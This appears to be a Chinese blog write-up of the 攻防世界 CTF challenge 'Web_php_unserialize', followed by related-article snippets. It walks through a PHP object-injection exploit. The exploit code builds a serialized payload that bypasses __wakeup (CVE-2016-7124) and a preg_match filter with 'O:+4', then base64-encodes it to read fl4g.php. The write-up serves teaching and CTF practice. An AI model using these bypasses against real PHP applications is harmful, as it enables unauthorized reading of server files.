攻防世界web进阶区Web_php_unserialize,序列化大详解

最新推荐文章于 2022-10-08 11:24:42 发布
最新推荐文章于 2022-10-08 11:24:42 发布
阅读量1.8k 收藏 9
点赞数 6
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hxhxhxhxx/article/details/107526463
版权

攻防世界web进阶区Web_php_unserialize详解

题目

在这里插入图片描述
题目是一个php反序列化,这里放出了一个源码审计

详解

1-如果我们第一步匹配到了 o或者c:数字:
那么他会停止运行,停止运行后,会触发__destruct(),【问为什么,见魔术方法讲解】
2-我们如何绕过__wakeup()呢?
那么就是让他反序列化失败,然后运行停止,执行了__destruct()
就是只需要令序列化字符串中标识变量数量的值大于实 际变量即可绕过__wakeup()函数
在这里插入图片描述

<?php
class Demo {
private $file = 'index.php';
//protected $file1 = 'index.php';
public function __construct($file) {
    $this->file = $file;
    //$this->file1 = $file1;
}
function __destruct() {
    echo @highlight_file($this->file, true);
}
function __wakeup() {
    if ($this->file != 'index.php') {
        //the secret is in the fl4g.php
        $this->file = 'index.php';
    }
}
}//这里我们新定义一个类,参数是fl4g.php,复制他原来的类下来,是为了序列化
$array= new Demo("fl4g.php");
$content=serialize($array);
echo ($content);
//O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}
序列化完成后,是这个,我们传入以后,并不能绕过wakeup
,因此,把1改成比1大即可,【为什么,见如下魔术方法绕过】
O:4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}
3-这时候我们该绕过正则,让他进行反序列化
使用+可以绕过preg_match() 正则匹配这里匹配的是 O:4,我们用 O:+4 即可绕过。
O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}
在这里插入图片描述
这里我们没有绕过正则,发现,出现了stop hacking
注意:base64的时候,需要在脚本中,一并base,因为如果复制,就相当于在记事本中,记事本中的格式与序列化的格式不同,自然也就base64结果不同
这里可以使用正则替换,也可以使用手工替换+号,但是手工替换有问题在php定义变量时 <\x00>类名<\x00>,因此,直接复制时,并不能获取到两个\00,详解见如下

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
    $obj = new Demo('fl4g.php');
    $str = serialize($obj);
    //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
    $str1 = str_replace('O:4', 'O:+4',$str);//绕过preg_match
    $str2 = str_replace(':1:', ':2:',$str1);//绕过wakeup
    var_dump($str2);
    //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
    var_dump(base64_encode($str2));
    //string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="
?>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

正则

/i 表示匹配的时候不区分大小写
\d 匹配一个数字字符。等价于 [0-9]。
“+” 出现至少1次
[ ] 是定义匹配的字符范围
[oc]是匹配o或c任意一个
[xyz] 字符集合。匹配所包含的任意一个字符。例如, ‘[abc]’ 可以匹配 “plain” 中的 ‘a’。
\d+是为了匹配[0-9]的数字,多次匹配!
在这里插入图片描述
”[oc]:“匹配的是,o:或者c:
"[oc]:\d+"匹配的是o或者c:数字
在这里插入图片描述
"[oc]:\d+"匹配的是o或者c:数字:
在这里插入图片描述

魔术方法

魔术方法,如果有反序列化的使用,在反序列化之前会先调用这个方法
function __wakeup()
当成员属性数目大于实际数目时可绕过wakeup方法,正则匹配可以用+号来进行绕过

php中带有双下划线(__)的是魔术方法,会在满足条件时自动调用

序列化是把数据类型压缩成一个字符串,方便处理,反序列化是把字符串还原成数据类型
正则表达式用于匹配字符串
观察demo类,有三个魔术方法:

__construct(),创建时自动调用,用得到的参数覆盖$file

__destruct(),销毁时调用,会显示文件的代码,这里要显示fl4g.php
__wakeup(),反序列化时调用,会把$file重置成index.php

CVE-2016-7124 wakeup绕过

在这里插入图片描述
在这里插入图片描述
将传入的序列化数据的对象变量个数由1更改为2,页面只执行了__destruct方法,而且输出name属性时报错,是由于反序列化数据时失败无法创建对象。
在这里插入图片描述

不同属性的对象序列化后字符格式是不一样的

转自这位大佬
最开始的我是先把序列化后的字符串输出 , 然后手工添加 " + " 号和破坏对象属性 , 最后再对其 Base64 编码后提交 , 但是始终拿不到 Flag

翻看了一会儿以前的笔记 , 突然发现了这个知识点

不同属性的对象序列化后字符格式是不一样的

Private属性 : 数据类型:属性名长度:&quot;\00类名\00属性名&quot;;数据类型:属性值长度:&quot;属性值&quot;;

Protected属性 : 数据类型:属性名长度:&quot;\00*\00属性名&quot;;数据类型:属性值长度:&quot;属性值&quot;;

Public属性 : 数据类型:属性名长度:&quot;属性名&quot;;数据类型:属性值长度:&quot;属性值&quot;;

本题中就有一个 Private 对象 , 会不会在复制粘贴时破坏了 " \00 " 这个特殊字符呢 ? 可以实验一下~

将序列化后的字符串直接存入文件
在这里插入图片描述

将序列化后的字符串复制粘贴存入文件

在这里插入图片描述

vim 查看 a.txt 文件
在这里插入图片描述

果然 , 输出到命令行的序列化字符串格式已经被破坏 , 因此必须要在脚本中直接构造出完整的 Exp
在这里插入图片描述

那么我们直接复制出来的这两个空格也就可以解释了

無名之涟
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 web Web_php_unserialize
汗的博客
08-24 604
攻防世界 web 高手 Web_php_unserialize 资源&工具 PHP 手册 W3School的PHP 参考手册 write up 源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { e
Web_php_unserialize(攻防世界
m0_70819573的博客
02-21 354
PHP5 < 5.6.25, PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过。2.主要有两个可绕过的点,preg_match和_wake up的绕过。(2)preg_match绕过。(1)_wake up的绕过。1.打开环境,审计代码。
攻防世界php2_攻防世界 WEB Web_php_unserialize
weixin_39649490的博客
12-19 167
0x00 - 题目描述PHP 反序列,老题新做了。打开 index.php 是这样的0x01 - 解题过程先审计一下代码,执行过程是从 17 行开始。123456789101112131415161718192021222324252627...
CTF笔记 攻防世界Web_php_unserialize
qq_51248658的博客
10-08 317
做过几次反序列化题目,但都是看wp写出来的,也没有记住,所以记一下笔记。小白理解,有不对的地方,还请大佬们指出。通过代码审计进行利用反序列化漏洞(遇到不懂函数要自己去查),然后需要自己进行实例化得到序列化结果,需要多练。
unserialize php ctf,CTF-WEB-XTCTF-Web_php_unserialize
weixin_34677379的博客
03-26 312
题目来源XTCTF-Web_php_unserialize题目考点:PHP代码审计、PHP正则、PHP序列化与反序列化解题思路题目源码class Demo {private $file = ‘index.php‘;public function __construct($file) {$this->file = $file;}function __destruct() {echo @high...
两道反序列化例题
limenzzz的博客
05-03 1256
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
序列化一个类_php的类的序列化脚本_
09-30
序列化则是通过`unserialize()`函数来实现的,它能将之前由`serialize()`产生的字符串恢复成原始对象: ```php $objRestored = unserialize($serialized); ``` ### 自定义序列化和反序列化 虽然`serialize()`和...
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
php数据序列化测试实例详解
10-19
3. **serialize**:这是PHP内置的序列化方法,可以将任何PHP变量转换为一个字符串,然后在需要的时候通过unserialize()函数还原。然而,相比于msgpack和json,serialize在时间和空间效率上相对较差,但在处理PHP特定...
php序列化与反序列化详解
01-20
unserialize() 恢复原先变量 eg: $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);echo ; print_r(unserialize($new)); 结果:a:3:{i:0;s:3:”Moe”;i:1;s:5:”Larry”;i...
PHP多种序列化/反序列化的方法详解
10-19
- `serialize` 和 `unserialize` 是PHP中基础且常用的序列化和反序列化工具,适用于大部分情况。 - `json_encode` 和 `json_decode` 提供了更紧凑、更易读的序列化格式,且跨语言兼容性好。 - `var_export` 和 `eval...
从一道CTF题学习PHP序列化漏洞
Fly_鹏程万里
09-17 6290
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
攻防世界web高手进阶 Web_php_unserialize
weixin_61835841的博客
04-20 932
有错请各位大佬指正 文章目录 工具 分析 操作 工具 1.火狐 2.phpstudy 分析 本题主要考察的知识点: 1.__construct():当对象创建(new)时会自动调用。将传入的 $file 赋值给本地的私有方法 $file 2.unserialize() 时是不会自动调用的。(构造函数) 3.__destruct():当对象被销毁时会自动调用。(析构函数) 4.__wakeup():unserialize() 时.
1st XTUCTF部分Writeup
Essen's
06-18 1053
1st XTUCTF   这次算是第一次在有限时间内完成ctf线上题,虽说题目很友好,但还是TCL,所以仅仅写出了misc题和一道web题,pwn和逆向题实在是不懂唉。 Misc 1.签到 下载附件并打开,里面是一张数独题目和题目描述(描述同图)签到题应该不设卡,说啥就是啥吧。           数独求解器解数独并按照要求输入,转为32大写md5值,得flag flag{9100E30EF4F...
php序列化姿势学习
彼岸花苏陌的博客
01-16 2289
php序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph
Web_php_unserialize
怪味巧克力的博客
05-25 3358
前言: 看到好的知识点就喜欢记录下来,一是为了方便自己以后复习,二是也能帮助大家了解知识点 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 。 首先拿到题目看到给出一段PHP源码 <?php class Demo { private $file = 'inde
攻防世界-Web_php_include
Fisher
05-07 734
攻防世界-Web_php_include 适合新手看,自己的学习记录 拿到题目,是一段代码分析代码: <?php show_source(__FILE__); //show_source(__FILE__)为高亮函数,使用show_source(__)会将整个文件都显示出来。 echo $_GET['hello']; //输出以get提交的hello函数后面的值* $page=$_GET...
serialize()序列化引起的魔术方法__wakeup()函数漏洞—攻防世界-web萌新-unserialize3
Sea_Sand息禅
04-17 3422
知识点: 1、serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 2、unserialize()函数:用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。 3、魔术方法:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除...
四个实例递进php序列化漏洞理解
大方子
09-14 8000
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...
攻防世界web_php_unserialize
最新发布
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP序列化漏洞的题目,需要掌握PHP序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标进行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP序列化漏洞的深入理解和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP序列化漏洞的CTF题目。这个题目主要考察选手对于PHP序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值